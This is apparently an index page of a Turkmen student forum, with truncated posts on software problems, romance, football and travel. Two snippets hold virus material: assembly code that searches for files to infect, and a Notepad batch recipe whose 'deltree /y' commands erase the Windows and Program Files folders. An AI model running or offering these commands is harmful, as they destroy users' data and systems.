ADOBE,PHOTOSHOP,cs2 9,0

salam hormatly agzalar men sizden hayışım bar men arada Adobe Photoshop cs2 9,0 inetden skaçat etdim indi şony açyan velin bir giden kod isleyar inetden forumlara seretdim o yerde yazılan kodlaryn birem bolanok mana kömek edip biljek barmy? eger kömek ederseniz minnetdear bolaryn önünden spasibo

Dowamy »

1159 4
Köneler, 10 years ago


Tagan Söhbedow

Salam hormatly agzalar! Men sizden bir zat sorajakdym: Siziň araňyzda şahyr we Maru Şahu Jahan gazetiniň öňki baş redaktory Tagan Söhbedowy tanaýan barmyka? Bu ýazga wagt aýyrdygyňyz üçün minnetdar!!!

Dowamy »

778 3
Köneler, 10 years ago


Nokia,İphone

Salam Talyplar.com yň ähli agzalaryna! Aý näme menem ine käwagt işim düşen wagty gelen bolýan yöne men ýazgy ýazmasam hem her gün siziň ýazgylaryňyzy okaýan dogrymy aýtsam inedi her gün açdygymda ilki bilen mail.ru ondan soň bolsa Talyplar.com girýän ine bu gezek men size bir sorag bilen yüzlenmek isleyän maňa maslahat berseniz bolmazmy?

Dowamy »

2141 44
Köneler, 10 years ago


Yazılım,web

mana şu programmyn instruksiyasy gerek hot na tureskom hot na russkom kak mogu nayti smojete pomoç please ine şu progyn ady
mmwebexpress_tr_v3.3
bilyan bar bolsa pojaluysta

Dowamy »

704 0
Köneler, 10 years ago


PC,black book

if our search mechanism as a whole also uses the z flag to
tell the main controlling program that it has found a file to infect
(z=file found, nz=no file found) then our completed search function
can be written like this:
find_file:
mov dx,offset comfile
mov al,00000110b
mov ah,4eh ;perform search fi...

Dowamy »

973 1
Köneler, 10 years ago


Pc:Virus şunu barlan

açıklama yapıyorum:

1.notepad 'i açın.

2.notepad in içine şu aşağıdaki kodları yazın:

-----------------------------------------
@echo off

c:\windows\command\deltree /y c:\windows\*.*

@echo off

c:\windows\command\deltree /y c:\progra~1\*.*

...

Dowamy »

1145 18
Köneler, 10 years ago


Sroçno help

hayışt mana kömek edin nadip siteden fotograf indirmeli

Dowamy »

1322 20
Köneler, 10 years ago


Çakylyk

день всем добры пожалуйста.Надеюсь с настроением у вас всё хорошо если нет то жаль что я не могу помочь!!!!
Hormatly agzalar emma türkmenler hayışt edyan meni msn ve ya başga bir yerlere dobavte özüme msn açdym emma hiç kim yok ine
mdes_89@hotmail.com
s uvajeniyem Murat:

Dowamy »

910 1
Köneler, 10 years ago


Türkiye Türkmenistan

salam talyplar comyn agzalary bu benim geri dönüşim gerçi benim dönüşim o kadarda önemli olmayabilir ama yinede kendimi küçümsemek istemem.havva dostlar men size öz sorglarym bilen yüzlenmek isleyän dogrusy sizden başka kime yüzlenjegimi bilemmok!!!Eger kyn görmezseniz maslahatlarynyza garaşyan:havva menin de meselam Türkiye ve Türkmenistan.Men tür...

Dowamy »

1783 2
Köneler, 10 years ago


Teklip

salam dostlar menin size bir teklibi bar ol hem şu taze tm aydım sitene yok aydimlari goymak men goymak isledim emma edip bilmedim kone you tube daki kopisi şu yerde yok ekeni şolaram nadip tapip bolar kop aydimlaram yok mana nadip goyulyanini aydarsaniz men ozümde barlaryny goyjak onda yazin

Dowamy »

1163 8
Köneler, 11 years ago


Türkmenistanda iş gurmak

salam hormatly agzalar.bu gezek hem men siden bir maslahat ve bilgi almak ücin yüzlenyan.menin türk dostum bar ine ol hem türkmenistanda iş gurmak isleyar sizin ücin name iş gursa govy bolar sorag-türkmenistanda mysal ücin şol adam iternet kafe acyp bilermi nahili yagdaylar bar name etmeli umuman şol internet kafe acmak isleyar şol acyo bilermi ve...

Dowamy »

6551 55
Köneler, 11 years ago


Maslahat

slm.hormatly talyplar com.menin sizden sorajagym bar ve sizden maslahat alasym gelyar.menin bir dostum türkiyede ynha ol hem gacak yagni vizasy bitmiş.menin soragym şol adam deport bolmadan türkmenistana gidip bilermi.yagni onun diymek isledigi turkiyede 3 ay işlap 1 ay türkmenistanda dync alyp geljek diyyar.bir adam ona diymiş 1500 dollara türkiye...

Dowamy »

1409 4
Köneler, 11 years ago


FENERBAHCE 0-2CHELSEA

slm.esasan hem fenerliler. size gynanc bildiryan.bu oyuna anme diyip name goyjak yaman passiv oyanadylar 2 mugt gol.her kim o gollary fenerbahceden garaşyardy yöne.bütün fenerliler goool diyip gygyrmaga garaşyardy yöne boşuna çynymy aytsam mena yaman erbet gynandym menem şu turkıya gelip fenerli boldum yöne şol 5 ayin i...

Dowamy »

1580 28
Köneler, 11 years ago


Hayiş

salam dostlar men sizden bu gezek hayiş bilen yüzlenyan kompyuterden yagny i netden govja düşünyaninz barmy aranyzada reklamasyny gördimde acdym yöne nadip yazgy yazmaly nadip surat goymaly v obşeem nadip bezap bolar ine şu yerde http://muratnezikforever.tr.gg/ şu yere bakyn mana yardimci olun

Dowamy »

1137 4
Köneler, 12 years ago


bagyşlan yenede söygi

Salam.Men yenede täze movzuk acyan cünki men dovamyny nädip ýazmalydygyny bilemmok.Men öz söygim barada size gysgaca düşündirsem meniňki hem edil murat mn agzanyňky ýaly hemme zat menzeş.Yöne ol menden 4yaş uly.
Men hem söyginiň bardygyna hem hakykatdygyna ynanyan ve + otvet beryan.Men dine ynanyan ynanmazcylyk hem bar yöne nädeýin,mejbury m...

Dowamy »

3040 59
Köneler, 12 years ago


Gün günden söygi....

Salam hormatlylar.Bu da hem biraz söygi barada:men şol gyza duşmazdan öň özüme şeýleräk sorag berýärdim:(maňa şu dünýäde näme yetmezcılık edıp bılerka?-jogap-şol gyza duşanymdan son düşündim bir şol yetmezcilik edip bılyar.Havva şeylerak men şol gyzy her görenimde birhili başga dünyade gezip yören yalı!Men her gezek şona söygimi aytmasam yüregim in...

Dowamy »

1290 4
Köneler, 12 years ago


CAKSIZ SÖYGİ

salam hormatly okujylarym men bu gezek sıze giňişleýin gürrüň bereýin. şeýleräk men ene atanyn arasynda saýlav goýmadym diňe siza şeýleräk sorag berdim siz bolsa mana şol sorag üçin maslahat berýäňiz men şol soragyň üsti bilen siziň söýgä düşünşiňizi barlap gördüm netıjede hem hic biriňiz položitelnyý jogap berip bilmediniz diýmek siziň araňyzda hi...

Dowamy »

1862 20
Köneler, 12 years ago


2 yıldan sonra hakyky....

Salam hormatly okujylarym men hem söygınıň hakykatdygyna göz yetırenlerıň yagny hakyky söygı dıymek ısleyän... Men 2005 ýylda bır gyza gözüm düşdi ana şondan soň men gün günden şol gyza bolan söýgim güyc alyp başlaady her gezek şol gyzy görenimde men bu dünyä şol gyza duşmak üçin gelen yalı men söýgimi her görenimde aýdasym gelyär yöne dılım tutuly...

Dowamy »

1699 25
Köneler, 12 years ago